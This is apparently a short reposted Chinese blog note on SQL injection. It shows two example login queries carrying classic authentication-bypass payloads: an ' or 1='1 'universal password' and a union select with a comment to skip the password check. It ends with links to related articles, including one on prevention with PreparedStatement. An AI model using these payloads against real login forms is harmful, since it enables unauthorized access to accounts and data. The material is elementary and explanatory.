SQL语句注入

Posted 人在钱途

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了SQL语句注入相关的知识,希望对你有一定的参考价值。

1:       select *from user where username=‘admin‘ and password=123456‘  or 1=‘1;    万能密码

2:       select *from user where username=‘admin‘  union select *from user ;/* and password=‘123456‘;    万能用户名

以上是关于SQL语句注入的主要内容,如果未能解决你的问题,请参考以下文章

DVWA靶机-sql自动注入

sql注入

SQL语句注入

sql注入 or 1=1的原理 啥?

利用PreparedStatement预防SQL注入

sql注入原理